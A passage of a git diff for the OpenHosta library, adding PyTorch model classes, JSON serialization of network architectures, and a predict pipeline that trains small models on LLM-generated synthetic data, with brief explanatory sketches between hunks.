+ for i, layer in enumerate(self.layers):
+ setattr(self, f'fc{i + 1}', layer)
+
+ # Set the loss function
+ if neural_network is None or neural_network.loss_function is None:
+ self.loss = nn.MSELoss()
+ else:
+ self.loss = custom_loss_to_pytorch(neural_network.loss_function)
+
+ # Set the optimizer
+ if neural_network is None or neural_network.optimizer is None:
+ self.optimizer = optim.Adam(self.parameters(), lr=0.001)
+ else:
+ self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001)
+
+ # Move model to the selected device (CPU or GPU)
+ self.to(self.device)
+
+ def trainer(self, train_set, epochs, verbose=False):
+ self.train()
+
+ for epoch in range(epochs):
+ running_loss = 0.0
+ for inputs, labels in train_set:
+                # Move inputs and labels to the right device
+ inputs, labels = inputs.to(self.device), labels.to(self.device)
+
+ # Zero the parameter gradients
+ self.optimizer.zero_grad()
+
+ # Forward pass
+ outputs = self(inputs)
+
+ loss = self.loss(outputs, labels)
+
+ # Backward pass and update
+ loss.backward()
+ self.optimizer.step()
+
+ running_loss += loss.item()
+            if verbose:
+                print(f"Epoch {epoch + 1}/{epochs}, Loss: {running_loss / len(train_set)}")
+
+ def validate(self, validation_set):
+ """Validate the model on a given validation set."""
+ self.eval() # Set model to eval mode (disable dropout, etc.)
+ validation_loss = 0.0
+ with torch.no_grad(): # No need to track gradients during validation
+ for inputs, labels in validation_set:
+ inputs, labels = inputs.to(self.device), labels.to(self.device)
+ outputs = self(inputs)
+ loss = self.loss(outputs, labels)
+ validation_loss += loss.item()
+ return validation_loss / len(validation_set)
+
+ def inference(self, x):
+ """Make predictions for the given test set."""
+ self.eval()
+ with torch.no_grad():
+ x = x.to(self.device)
+ outputs = self(x)
+ return outputs
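Both built-in models size their default layers with the same heuristic (a transition value derived from input size, output size, and complexity). This sketch reproduces it so the resulting layer shapes can be checked in isolation; the helper name is illustrative:

```python
def default_layer_sizes(input_size, output_size, complexity):
    """Return the (in, out) pairs of the three default Linear layers."""
    transition = int(((input_size * output_size) / 2) * complexity)
    first = int(input_size * (2 * complexity))
    # wide-to-narrow problems shrink the hidden layer by the output size
    hidden = int(transition / output_size) if input_size > output_size else transition
    return [(input_size, first), (first, hidden), (hidden, output_size)]
```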
diff --git a/src/OpenHosta/exec/predict/model/hosta_model.py b/src/OpenHosta/exec/predict/model/hosta_model.py
new file mode 100644
index 0000000..08df057
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/hosta_model.py
@@ -0,0 +1,33 @@
+from abc import ABC
+from typing import Optional
+
+import torch
+from torch import nn
+
+
+class HostaModel(ABC, nn.Module):
+    def __init__(self, device: Optional[str]):
+        super().__init__()
+        self.device = device if device is not None else ('cuda' if torch.cuda.is_available() else 'cpu')
+        self.layers = []
+
+ def trainer(self, train_set, epochs):
+ pass
+
+ def forward(self, x):
+ for layer in self.layers:
+ x = layer(x)
+ return x
+
+ def validate(self, validation_set):
+ pass
+
+ def inference(self, x):
+ pass
+
+ def init_weights(self, path: str):
+ self.load_state_dict(torch.load(path, weights_only=True, map_location=self.device))
+ self.eval()
+
+ def save_weights(self, path: str):
+        torch.save(self.state_dict(), path)
diff --git a/src/OpenHosta/exec/predict/model/model_provider.py b/src/OpenHosta/exec/predict/model/model_provider.py
new file mode 100644
index 0000000..dc221c2
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/model_provider.py
@@ -0,0 +1,34 @@
+from typing import Optional, Literal, get_origin
+
+from .builtins.classification import Classification
+from .builtins.linear_regression import LinearRegression
+from .hosta_model import HostaModel
+from .neural_network import NeuralNetwork
+from .neural_network_types import ArchitectureType
+from ..predict_config import PredictConfig
+from ....core.hosta import Func
+from ....utils.torch_nn_utils import type_size
+
+
+class HostaModelProvider:
+ @staticmethod
+ def from_hosta_func(func: Func, config: Optional[PredictConfig], architecture: Optional[NeuralNetwork], path: str, verbose: int) -> Optional[HostaModel]:
+ input_size = 0
+ for arg in func.f_type[0]:
+ input_size += type_size(arg, config.max_tokens)
+ output_size = type_size(func.f_type[1], config.max_tokens)
+ hosta_model: Optional[HostaModel] = None
+ if config is not None and config.model_type is not None:
+ if config.model_type == ArchitectureType.LINEAR_REGRESSION:
+ hosta_model = LinearRegression(architecture, input_size, output_size, config.complexity)
+ elif config.model_type == ArchitectureType.CLASSIFICATION:
+ hosta_model = Classification(architecture, input_size, output_size, config.complexity, 1)
+ else:
+ if get_origin(func.f_type[1]) == Literal:
+ hosta_model = Classification(architecture, input_size, output_size, 4, 1)
+ else:
+ hosta_model = LinearRegression(architecture, input_size, output_size, 4)
+
+ with open(path, 'w') as file:
+ file.write(NeuralNetwork.from_torch_nn(hosta_model).to_json())
+ return hosta_model
diff --git a/src/OpenHosta/exec/predict/model/neural_network.py b/src/OpenHosta/exec/predict/model/neural_network.py
new file mode 100644
index 0000000..ae61278
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/neural_network.py
@@ -0,0 +1,155 @@
+import json
+from typing import Optional
+
+from torch import nn
+
+from .neural_network_types import LayerType, OptimizerAlgorithm, LossFunction, Layer
+from ....utils.torch_nn_utils import pytorch_layer_to_custom, pytorch_loss_to_custom, pytorch_optimizer_to_custom
+
+
+class NeuralNetwork:
+ def __init__(self):
+ """
+ Initialize a NeuralNetwork object.
+ """
+ self.layers: list[Layer] = []
+ self.loss_function: Optional[LossFunction] = None
+ self.optimizer: Optional[OptimizerAlgorithm] = None
+
+ def add_layer(self, layer: Layer):
+ """
+ Add a layer to the neural network.
+
+ :param layer: The layer to be added.
+ :type layer: Layer
+        :raises TypeError: If the argument is not an instance of Layer.
+ """
+ if not isinstance(layer, Layer):
+ raise TypeError("Expected a Layer instance")
+ self.layers.append(layer)
+
+ def summary(self):
+ """
+ Print a summary of the neural network layers.
+ """
+ for i, layer in enumerate(self.layers):
+ print(f"Layer {i + 1}: {layer}")
+
+ def set_loss_function(self, loss_function: LossFunction):
+ """
+ Set the loss function for the neural network.
+
+ :param loss_function: The loss function to be set.
+ :type loss_function: LossFunction
+ """
+ self.loss_function = loss_function
+
+ def set_optimizer(self, optimizer: OptimizerAlgorithm):
+ """
+ Set the optimizer for the neural network.
+
+ :param optimizer: The optimizer to be set.
+ :type optimizer: OptimizerAlgorithm
+ """
+ self.optimizer = optimizer
+
+ def to_json(self) -> str:
+ """
+ Convert the neural network configuration to a JSON string.
+
+ :return: JSON string representation of the neural network
+ :rtype: str
+ """
+ network_dict = {
+ "layers": [
+ layer.to_json()
+ for layer in self.layers
+ ]
+ }
+ if self.loss_function is not None:
+ network_dict["loss_function"] = self.loss_function.name
+ if self.optimizer is not None:
+ network_dict["optimizer"] = self.optimizer.name
+ return json.dumps(network_dict, indent=2)
+
+ @classmethod
+ def from_json(cls, json_str: str) -> 'NeuralNetwork':
+ """
+ Create a neural network from a JSON string configuration.
+
+ :param json_str: JSON string containing the neural network configuration
+ :type json_str: str
+ :return: A new NeuralNetwork instance
+ :rtype: NeuralNetwork
+ :raises ValueError: If the JSON string is invalid or contains invalid configuration
+ """
+ try:
+ network_dict = json.loads(json_str)
+ network = cls()
+
+ if network_dict.get("loss_function", None) is not None:
+ network.loss_function = LossFunction[network_dict.get("loss_function", None)]
+ else:
+ network.loss_function = None
+
+ if network_dict.get("optimizer", None) is not None:
+ network.optimizer = OptimizerAlgorithm[network_dict.get("optimizer", None)]
+ else:
+ network.optimizer = None
+
+ # Add layers
+ for layer_dict in network_dict.get("layers", []):
+ layer = Layer(
+ layer_type=LayerType[layer_dict.get("layer_type", None)],
+ in_features=layer_dict.get("in_features"),
+ out_features=layer_dict.get("out_features"),
+ kernel_size=layer_dict.get("kernel_size"),
+ stride=layer_dict.get("stride"),
+ padding=layer_dict.get("padding"),
+ dropout=layer_dict.get("dropout")
+ )
+ network.add_layer(layer)
+
+ return network
+
+ except (json.JSONDecodeError, KeyError, ValueError) as e:
+ raise ValueError(f"Invalid JSON configuration: {str(e)}")
+
+ @classmethod
+ def from_torch_nn(cls, torch_model: nn.Module, loss_fn=None, optimizer=None) -> 'NeuralNetwork':
+ """
+ Creates a NeuralNetwork instance from a torch.nn.Module model,
+ with optional loss function and optimizer mappings.
+
+ :param torch_model: The PyTorch neural network model.
+ :param loss_fn: PyTorch loss function instance (optional).
+ :param optimizer: PyTorch optimizer instance (optional).
+ :return: A NeuralNetwork instance.
+ """
+ network = cls()
+
+ # Iterating through the PyTorch model's children (layers)
+ for layer in torch_model.children():
+ try:
+ nn_layer = pytorch_layer_to_custom(layer)
+ network.add_layer(nn_layer)
+        except ValueError:
+            # Unsupported layers are skipped silently
+            pass
+
+ # Set loss function and optimizer if specified
+ if loss_fn is not None:
+ try:
+ network.loss_function = pytorch_loss_to_custom(loss_fn)
+ except ValueError as e:
+ print(f"Skipping unsupported loss function: {e}")
+
+ # Set optimizer if specified
+ if optimizer is not None:
+ try:
+ network.optimizer = pytorch_optimizer_to_custom(optimizer)
+ except ValueError as e:
+ print(f"Skipping unsupported optimizer: {e}")
+
+ return network
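The `to_json`/`from_json` pair above round-trips the network through a plain dictionary. A minimal standalone sketch of the expected JSON shape (the key names follow the code above; the concrete layer values are made up, and enums are stored by `.name` so `from_json` can recover them with a `LossFunction[...]` / `OptimizerAlgorithm[...]` lookup):

```python
import json

# Hypothetical example of the structure NeuralNetwork.to_json() emits:
# layer dicts omit keys whose values are None.
network_dict = {
    "layers": [
        {"layer_type": "LINEAR", "in_features": 4, "out_features": 8},
        {"layer_type": "RELU"},
        {"layer_type": "LINEAR", "in_features": 8, "out_features": 1},
    ],
    "loss_function": "MSE_LOSS",
    "optimizer": "ADAMW",
}
encoded = json.dumps(network_dict, indent=2)
decoded = json.loads(encoded)
assert decoded == network_dict  # the round trip is lossless
```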
diff --git a/src/OpenHosta/exec/predict/model/neural_network_types.py b/src/OpenHosta/exec/predict/model/neural_network_types.py
new file mode 100644
index 0000000..1baae4d
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/neural_network_types.py
@@ -0,0 +1,154 @@
+from enum import Enum
+from typing import Optional, Union
+
+class ArchitectureType(Enum):
+ """
+ Enum for different built-in architectures for neural networks.
+ """
+ LINEAR_REGRESSION = 1
+ CLASSIFICATION = 2
+
+
+class LayerType(Enum):
+ """
+ Enum for different types of layers in a neural network.
+ https://pytorch.org/docs/stable/nn.html
+ """
+ LINEAR = 1
+ CONV2D = 2
+ RELU = 3
+ DROPOUT = 4
+ BATCHNORM1D = 5
+ BATCHNORM2D = 6
+ MAXPOOL2D = 7
+ AVGPOOL2D = 8
+ SIGMOID = 9
+ SOFTMAX = 10
+ TANH = 11
+
+class OptimizerAlgorithm(Enum):
+ """
+ Enum for different types of optimizers in a neural network.
+ https://pytorch.org/docs/stable/optim.html#algorithms
+ """
+ ADADELTA = 1
+ ADAFACTOR = 2
+ ADAGRAD = 3
+ ADAM = 4
+ ADAMW = 5
+ SPARSEADAM = 6
+ ADAMAX = 7
+ ASGD = 8
+ LBFGS = 9
+ NADAM = 10
+ RADAM = 11
+ RMSPROP = 12
+ RPROP = 13
+ SGD = 14
+
+class Device(Enum):
+ """
+ Enum for different types of devices to run the neural network
+ """
+ CPU = "cpu"
+ CUDA = "cuda"
+
+class LossFunction(Enum):
+ """
+ Enum for different types of loss functions in a neural network.
+ https://pytorch.org/docs/stable/nn#loss-functions
+ """
+ L1_LOSS = 1
+ MSE_LOSS = 2
+ CROSS_ENTROPY_LOSS = 3
+ CTC_LOSS = 4
+ NLL_LOSS = 5
+ POISSON_NLL_LOSS = 6
+ GAUSSIAN_NLL_LOSS = 7
+ KL_DIV_LOSS = 8
+ BCE_LOSS = 9
+ BCE_WITH_LOGITS_LOSS = 10
+ MARGIN_RANKING_LOSS = 11
+ HINGE_EMBEDDING_LOSS = 12
+ MULTI_LABEL_MARGIN_LOSS = 13
+ HUBER_LOSS = 14
+ SMOOTH_L1_LOSS = 15
+ SOFT_MARGIN_LOSS = 16
+ MULTI_LABEL_SOFT_MARGIN_LOSS = 17
+ COSINE_EMBEDDING_LOSS = 18
+ MULTI_MARGIN_LOSS = 19
+ TRIPLET_MARGIN_LOSS = 20
+ TRIPLET_MARGIN_WITH_DISTANCE_LOSS = 21
+
+class Layer:
+ """
+ Initialize a Layer object.
+
+ :param layer_type: The type of the layer.
+    :param in_features: Number of input features or channels.
+    :param out_features: Number of output features or channels.
+    :param kernel_size: Size of the kernel/filter.
+    :param stride: Stride of the kernel/filter.
+    :param padding: Padding added to the input.
+ :param dropout: Dropout rate.
+ """
+ def __init__(
+ self,
+ layer_type: LayerType,
+ in_features: Optional[int] = None,
+ out_features: Optional[int] = None,
+ kernel_size: Optional[Union[int, tuple[int, int]]] = None,
+ stride: Optional[Union[int, tuple[int, int]]] = None,
+ padding: Optional[Union[int, str]] = None,
+ dropout: Optional[float] = None,
+ ):
+ self.layer_type: LayerType = layer_type
+ self.in_features: Optional[int] = in_features
+ self.out_features: Optional[int] = out_features
+ self.kernel_size: Optional[Union[int, tuple[int, int]]] = kernel_size
+ self.stride: Optional[Union[int, tuple[int, int]]] = stride
+ self.padding: Optional[Union[int, str]] = padding
+ self.dropout: Optional[float] = dropout
+
+ def __repr__(self):
+ """
+ Return a string representation of the Layer object.
+
+ :return: String representation of the Layer object.
+ :rtype: str
+ """
+ return (
+ f"Layer(type={self.layer_type}, "
+ f"in_features={self.in_features}, "
+ f"out_features={self.out_features}, "
+ f"kernel_size={self.kernel_size}, "
+ f"stride={self.stride}, "
+ f"padding={self.padding}, "
+ f"dropout={self.dropout})"
+ )
+
+    def to_json(self):
+        """
+        Convert the layer configuration to a JSON-serializable dictionary.
+
+        :return: Dictionary representation of the layer
+        :rtype: dict
+        """
+        layer_dict = {}
+
+        if self.layer_type is not None:
+            layer_dict["layer_type"] = self.layer_type.name
+        if self.in_features is not None:
+            layer_dict["in_features"] = self.in_features
+        if self.out_features is not None:
+            layer_dict["out_features"] = self.out_features
+        if self.kernel_size is not None:
+            layer_dict["kernel_size"] = self.kernel_size
+        if self.stride is not None:
+            layer_dict["stride"] = self.stride
+        if self.padding is not None:
+            layer_dict["padding"] = self.padding
+        if self.dropout is not None:
+            layer_dict["dropout"] = self.dropout
+
+        return layer_dict
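Serialization throughout this module stores enum members by `.name` and recovers them with an index lookup (`LayerType[name]`, `LossFunction[name]`). A small standalone illustration of that pattern, using a trimmed-down stand-in enum rather than the real one:

```python
from enum import Enum

class LayerType(Enum):
    # a two-member stand-in for the full enum above
    LINEAR = 1
    RELU = 3

# to_json stores the symbolic name; from_json recovers the member with
# an index lookup, which raises KeyError for unknown names.
name = LayerType.LINEAR.name
assert name == "LINEAR"
assert LayerType[name] is LayerType.LINEAR

recovered = "unset"
try:
    LayerType["CONV3D"]
except KeyError:
    recovered = None
assert recovered is None  # unknown names fail loudly
```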
diff --git a/src/OpenHosta/exec/predict/predict.py b/src/OpenHosta/exec/predict/predict.py
new file mode 100644
index 0000000..c5d7e2f
--- /dev/null
+++ b/src/OpenHosta/exec/predict/predict.py
@@ -0,0 +1,160 @@
+import os
+from typing import Union, Optional
+
+from .dataset.dataset import HostaDataset, SourceType
+from .dataset.oracle import LLMSyntheticDataGenerator
+from .model import HostaModel
+from .model.model_provider import HostaModelProvider
+from .model.neural_network import NeuralNetwork
+from .predict_config import PredictConfig
+from .predict_memory import PredictMemory, File
+from ...core.config import Model, DefaultModel
+from ...core.hosta import Hosta, Func
+
+
+def predict(
+ config: PredictConfig = PredictConfig(),
+ oracle: Optional[Union[Model, HostaDataset]] = None,
+ verbose: int = 0
+) -> Union[int, float, bool, str]:
+ """
+ Predicts a result using an existing model or by creating a new one.
+
+ Args:
+ config: Model configuration
+ oracle: Reference model or dataset for data generation
+ verbose: Enables detailed logging
+
+ Returns:
+ Model prediction
+ """
+    assert config is not None, "Please provide a valid configuration (not None)"
+    assert verbose is not None and 0 <= verbose <= 2, "Please provide a valid verbose level (0, 1 or 2); default is 0"
+
+ func: Func = getattr(Hosta(), "_infos")
+
+ name = config.name if config and config.name else str(func.f_name)
+ base_path = config.path if config and config.path else os.getcwd()
+ memory: PredictMemory = PredictMemory.load(base_path=base_path, name=name)
+
+ dataset: Optional[HostaDataset] = None
+
+ hosta_model: HostaModel = get_hosta_model(memory.architecture, func, config, verbose)
+ if verbose == 2:
+ print(f"[\033[92mArchitecture\033[0m] loaded, type : {type(hosta_model).__name__}")
+
+ if not load_weights(memory, hosta_model, verbose):
+ train_model(config, memory, hosta_model, dataset, oracle, func, verbose)
+
+ if dataset is None:
+ dataset = HostaDataset.from_input(func.f_args, verbose)
+ else:
+ dataset.prepare_inference(func.f_args)
+ torch_prediction = hosta_model.inference(dataset.inference.input)
+ prediction = dataset.decode(torch_prediction, func_f_type=func.f_type[1])
+    if isinstance(prediction, list):
+        return prediction[0]
+    else:
+        return prediction
+
+
+def get_hosta_model(architecture_file: File, func: Func, config: Optional[PredictConfig] = None, verbose: int = 0) -> HostaModel:
+ """
+ Load or create a new model.
+ """
+ architecture: Optional[NeuralNetwork] = None
+
+ if architecture_file.exist:
+        with open(architecture_file.path, "r") as file:
+            architecture_json = file.read()
+        architecture = NeuralNetwork.from_json(architecture_json)
+ if verbose == 2:
+ print(f"[\033[92mArchitecture\033[0m] found at {architecture_file.path}")
+ else:
+ if verbose == 2:
+ print(f"[\033[93mArchitecture\033[0m] not found, creating one")
+ return HostaModelProvider.from_hosta_func(func, config, architecture, architecture_file.path, verbose)
+
+
+def load_weights(memory: PredictMemory, hosta_model: HostaModel, verbose: int) -> bool:
+ """
+ Load weights if they exist.
+ """
+ if memory.weights.exist:
+
+ if verbose == 2:
+ print(f"[\033[92mWeights\033[0m] found at {memory.weights.path}")
+ hosta_model.init_weights(memory.weights.path)
+ return True
+
+    if verbose == 2:
+        print(f"[\033[93mWeights\033[0m] not found, generating new ones")
+ return False
+
+
+def train_model(config: PredictConfig, memory: PredictMemory, model: HostaModel, dataset: HostaDataset, oracle: Optional[Union[Model, HostaDataset]], func: Func, verbose: int) -> None:
+ """
+ Prepare the data and train the model.
+ """
+ if memory.data.exist:
+ if verbose == 2:
+ print(f"[\033[92mData\033[0m] found at {memory.data.path}")
+        train_set, val_set = HostaDataset.from_data(memory.data.path, batch_size=1, shuffle=True, train_set_size=0.8, verbose=verbose)  # verbose will process all the examples and add them to val_set
+ else:
+ if verbose == 2:
+ print(f"[\033[93mData\033[0m] not processed, preparing data")
+ train_set, val_set = prepare_dataset(config, memory, dataset, func, oracle, verbose)
+
+    if config.epochs is None:
+        n_examples = len(train_set.dataset)
+        config.epochs = int(2 * n_examples / config.batch_size) if config.batch_size != n_examples else 2 * n_examples
+    assert config.epochs > 0, f"epochs must be greater than 0, got {config.epochs}"
+
+ model.trainer(train_set, epochs=config.epochs)
+
+ if verbose > 0:
+ model.validate(val_set)
+
+ model.save_weights(memory.weights.path)
+
+
+def prepare_dataset(config: PredictConfig, memory: PredictMemory, dataset: HostaDataset, func: Func, oracle: Optional[Union[Model, HostaDataset]], verbose: int) -> tuple:
+ """
+ Prepare the dataset for training.
+ """
+ if config.dataset_path is not None:
+ if verbose == 2:
+ print(f"[\033[92mDataset\033[0m] found at {config.dataset_path}")
+        dataset = HostaDataset.from_files(config.dataset_path, SourceType.CSV, verbose)  # or JSONL; format detection is not implemented yet
+    else:
+ if verbose == 2:
+ print(f"[\033[93mDataset\033[0m] not found, generate data")
+ dataset = generate_data(func, oracle, verbose)
+ dataset.save(os.path.join(memory.predict_dir, "generated_data.csv"), SourceType.CSV)
+ if verbose == 2:
+ print(f"[\033[92mDataset\033[0m] generated!")
+ dataset.encode(max_tokens=10)
+ dataset.tensorify()
+ dataset.save_data(memory.data.path)
+
+ if config.batch_size is None:
+ config.batch_size = int(0.05 * len(dataset.data)) if 0.05 * len(dataset.data) > 1 else len(dataset.data)
+ train_set, val_set = dataset.convert_data(batch_size=config.batch_size, shuffle=True, train_set_size=0.8)
+
+ if verbose == 2:
+ print(f"[\033[92mDataset\033[0m] processed and saved at {memory.data.path}")
+ return train_set, val_set
+
+
+def generate_data(func: Func, oracle: Optional[Union[Model, HostaDataset]], verbose: int) -> HostaDataset:
+ """
+ Generate data for training.
+ """
+ data = LLMSyntheticDataGenerator.generate_synthetic_data(
+ func=func,
+ request_amounts=3, # TODO: make it a parameter
+ examples_in_req=80, # TODO: make it a parameter
+ model=oracle if oracle is not None else DefaultModel().get_default_model()
+ )
+ return HostaDataset.from_list(data, verbose)
+
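The defaults chosen above (batch size of roughly 5% of the dataset, and about two passes' worth of batches as the epoch count) can be checked in isolation. The helper names below are illustrative only, not part of the library:

```python
def default_batch_size(n_examples: int) -> int:
    # 5% of the dataset, falling back to the whole set when that rounds below 2,
    # as in prepare_dataset above
    size = int(0.05 * n_examples)
    return size if size > 1 else n_examples

def default_epochs(n_examples: int, batch_size: int) -> int:
    # roughly two epochs' worth of batches, as in train_model above
    if batch_size != n_examples:
        return int(2 * n_examples / batch_size)
    return 2 * n_examples

assert default_batch_size(240) == 12   # 5% of 240
assert default_batch_size(20) == 20    # 5% of 20 rounds to 1, use the full set
assert default_epochs(240, 12) == 40
```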
diff --git a/src/OpenHosta/exec/predict/predict_config.py b/src/OpenHosta/exec/predict/predict_config.py
new file mode 100644
index 0000000..645b7ca
--- /dev/null
+++ b/src/OpenHosta/exec/predict/predict_config.py
@@ -0,0 +1,66 @@
+from typing import Optional
+
+from .model.neural_network_types import ArchitectureType
+
+
+class PredictConfig:
+ def __init__(self,
+ model_type: ArchitectureType = None,
+ name: str = None,
+ path: str = None,
+ version: str = None,
+ complexity: int = 4,
+ max_tokens: int = 10,
+ epochs: Optional[int] = None,
+ batch_size: Optional[int] = None,
+ learning_rate: Optional[float] = None,
+ get_loss: Optional[float] = None,
+ dataset_path: Optional[str] = None
+ ):
+ self.model_type: ArchitectureType = model_type
+
+ self.name: str = name
+ self.path: str = path
+ self.version: str = version
+
+ self.complexity: int = complexity
+ self.max_tokens: int = max_tokens
+
+ self.batch_size: int = batch_size
+ self.epochs: int = epochs
+ self.learning_rate: float = learning_rate
+ self.get_loss: float = get_loss
+ self.dataset_path: str = dataset_path
+
+    def to_json(self):
+        import json
+        return json.dumps({
+            "name": self.name,
+            "model_type": self.model_type.name if self.model_type is not None else None,
+            "path": self.path,
+            "version": self.version,
+            "complexity": self.complexity,
+            "max_tokens": self.max_tokens,
+            "epochs": self.epochs,
+            "batch_size": self.batch_size,
+            "learning_rate": self.learning_rate,
+            "get_loss": self.get_loss,
+            "dataset_path": self.dataset_path,
+        }, indent=2)
+
+    @staticmethod
+    def from_json(json_str: str):
+        import json
+        data = json.loads(json_str)
+        return PredictConfig(
+            name=data["name"],
+            model_type=ArchitectureType[data["model_type"]] if data["model_type"] is not None else None,
+            path=data["path"],
+            version=data["version"],
+            complexity=data["complexity"],
+            max_tokens=data["max_tokens"],
+            epochs=data["epochs"],
+            batch_size=data["batch_size"],
+            learning_rate=data["learning_rate"],
+            get_loss=data["get_loss"],
+            dataset_path=data["dataset_path"],
+        )
diff --git a/src/OpenHosta/exec/predict/predict_memory.py b/src/OpenHosta/exec/predict/predict_memory.py
new file mode 100644
index 0000000..74ebd04
--- /dev/null
+++ b/src/OpenHosta/exec/predict/predict_memory.py
@@ -0,0 +1,82 @@
+import os
+from enum import Enum
+from typing import Optional, Dict, NamedTuple
+
+from ...core.memory import HostaMemory
+
+# Base structures
+File = NamedTuple("File", [("exist", bool), ("path", str)])
+
+class PredictFileType(Enum):
+    """Enumeration for different types of files in the prediction memory."""
+ ARCHITECTURE = "model.json"
+ WEIGHTS = "weights.pth"
+ DICTIONARY = "dictionary.txt"
+ DATA = "data.json"
+ SUMMARY = "summary.txt"
+
+class PredictMemory(HostaMemory):
+ """
+ This module defines the PredictMemory class, which manages the structure of files for prediction purposes.
+ It inherits from HostaMemory, which handles the main cache directory.
+
+    It uses the File structure to store each file's status and path.
+ """
+ def __init__(self, base_path: Optional[str] = None, *, name: str = None, **kwargs):
+ super().__init__(base_path=base_path, **kwargs)
+ if name is None:
+ raise ValueError("name must be specified")
+ self.name = name
+ self.paths: Dict[PredictFileType, str] = {}
+ self.files: Dict[PredictFileType, File] = {}
+
+ @staticmethod
+ def load(base_path: Optional[str] = None, name: str = None) -> 'PredictMemory':
+ """
+ Static method to create or load a memory.
+ Args:
+ base_path: Base path for the memory.
+ name: Name of the memory.
+ Returns:
+ PredictMemory instance.
+ """
+ memory = PredictMemory(base_path=base_path, name=name)
+        memory._initialize_predict_directory()
+        memory._check_files()
+        return memory
+
+    def _initialize_predict_directory(self) -> None:
+ """
+ Initializes the directory and file structure for predictions.
+ """
+ self.predict_dir = os.path.join(self.cache_root, self.name)
+ self._ensure_directory_exists(self.predict_dir)
+ self.paths = {
+ file_type: os.path.join(self.predict_dir, file_type.value)
+ for file_type in PredictFileType
+ }
+
+ def _check_files(self) -> None:
+ """
+ Checks the status of all files.
+ """
+ for file_type in PredictFileType:
+ path = self.paths[file_type]
+ exists = os.path.exists(path) and os.path.getsize(path) > 0
+ self.files[file_type] = File(exist=exists, path=path)
+
+ @property
+ def architecture(self) -> File: return self.files[PredictFileType.ARCHITECTURE]
+
+ @property
+ def weights(self) -> File: return self.files[PredictFileType.WEIGHTS]
+
+ @property
+ def data(self) -> File: return self.files[PredictFileType.DATA]
+
+ @property
+ def summary(self) -> File: return self.files[PredictFileType.SUMMARY]
+
+ @property
+ def dictionary(self) -> File: return self.files[PredictFileType.DICTIONARY]
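`PredictMemory._check_files` treats an empty file the same as a missing one, so a crashed run that left a zero-byte `weights.pth` behind will not be mistaken for a trained model. The check, sketched standalone with the same `File` structure (the `check_file` helper is illustrative, not the library's API):

```python
import os
import tempfile
from typing import NamedTuple

File = NamedTuple("File", [("exist", bool), ("path", str)])

def check_file(path: str) -> File:
    # Mirrors PredictMemory._check_files: a file only "exists" when it
    # is present on disk AND non-empty.
    exists = os.path.exists(path) and os.path.getsize(path) > 0
    return File(exist=exists, path=path)

with tempfile.TemporaryDirectory() as d:
    missing = check_file(os.path.join(d, "model.json"))
    assert missing.exist is False

    empty_path = os.path.join(d, "weights.pth")
    open(empty_path, "w").close()
    empty = check_file(empty_path)
    assert empty.exist is False       # zero-byte file counts as missing

    data_path = os.path.join(d, "data.json")
    with open(data_path, "w") as f:
        f.write("{}")
    present = check_file(data_path)
    assert present.exist is True
```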
diff --git a/src/OpenHosta/exec/thinkof.py b/src/OpenHosta/exec/thinkof.py
new file mode 100644
index 0000000..6c36b53
--- /dev/null
+++ b/src/OpenHosta/exec/thinkof.py
@@ -0,0 +1,54 @@
+from __future__ import annotations
+
+import json
+from pydoc import locate
+
+from .emulate import emulate
+from ..core.config import DefaultManager
+from ..core.hosta import Func
+from ..utils.errors import RequestError
+from ..utils.meta_prompt import THOUGHT_PROMPT
+
+
+def guess_type(key: str, *args) -> object:
+ l_default = DefaultManager.get_default_model()
+
+ l_user_prompt = (
+ "Here's the function behavior:\n"
+ + f"{key}\n"
+ + "Here's the arguments:\n"
+ + f"{args}\n"
+ )
+
+ response = l_default.simple_api_call(
+ sys_prompt=f"{THOUGHT_PROMPT!r}{THOUGHT_PROMPT.USER_SEP}",
+ user_prompt=l_user_prompt,
+ temperature=0.5,
+ )
+
+ type_json = response["choices"][0]["message"]["content"]
+ type_dict = json.loads(type_json)
+ type_str = str(type_dict["type"])
+
+ return locate(type_str)
+
+
+def thinkof(key):
+
+ def inner_func(*args, **kwargs):
+ _infos: Func = Func()
+
+ if not hasattr(inner_func, "_return_type"):
+ setattr(inner_func, "_return_type", guess_type(key, *args))
+
+ _infos.f_def = key
+ _infos.f_call = str(*args)
+ _infos.f_type = ([], inner_func._return_type)
+
+ try:
+ result = emulate(_infos=_infos)
+ except Exception as e:
+ raise RequestError(f"[thinkof] Cannot emulate the function.\n{e}")
+ return result
+
+ return inner_func
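`thinkof` resolves the return type with a single LLM call, then caches it as an attribute on the closure itself so that repeated calls skip `guess_type`. The caching trick in isolation, with a counting stub standing in for the real LLM call:

```python
calls = {"n": 0}

def guess_type_stub(key, *args):
    # stands in for guess_type(), which would make one LLM request
    calls["n"] += 1
    return int

def thinkof_stub(key):
    def inner_func(*args, **kwargs):
        # first call stores the result on the function object;
        # later calls find the attribute and reuse it
        if not hasattr(inner_func, "_return_type"):
            setattr(inner_func, "_return_type", guess_type_stub(key, *args))
        return inner_func._return_type
    return inner_func

f = thinkof_stub("add two numbers")
assert f(1, 2) is int
assert f(3, 4) is int
assert calls["n"] == 1   # the type was only resolved once
```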
diff --git a/src/OpenHosta/exec/thought.py b/src/OpenHosta/exec/thought.py
new file mode 100644
index 0000000..2b393b2
--- /dev/null
+++ b/src/OpenHosta/exec/thought.py
@@ -0,0 +1,8 @@
+from __future__ import annotations
+
+from ..core.hosta import Hosta, CotType
+
+
+def thought(task: str) -> None:
+ x = Hosta()
+ x._bdy_add('cot', CotType(task=task))
diff --git a/src/OpenHosta/exec/use.py b/src/OpenHosta/exec/use.py
new file mode 100644
index 0000000..943c676
--- /dev/null
+++ b/src/OpenHosta/exec/use.py
@@ -0,0 +1,34 @@
+from __future__ import annotations
+
+from typing import Any, Callable, Union
+
+from ..core.hosta import Hosta, UseType
+
+__all__ = (
+ "use",
+ "VAR",
+ "TOOL",
+ "RAG",
+ "DB"
+)
+
+
+class VAR:
+ pass
+
+
+class TOOL:
+ pass
+
+
+class RAG:
+ pass
+
+
+class DB:
+ pass
+
+
+def use(obj: Union[Callable, Any], typ: Union[VAR, TOOL, RAG, DB], title: str):
+ x = Hosta()
+ x._bdy_add('use', UseType())
diff --git a/src/OpenHosta/model.py b/src/OpenHosta/model.py
deleted file mode 100644
index f49acde..0000000
--- a/src/OpenHosta/model.py
+++ /dev/null
@@ -1,102 +0,0 @@
-import torch
-import torch.nn as nn
-import torch.nn.functional as F
-import time
-import json
-
-class CustomLinearModel(nn.Module):
-
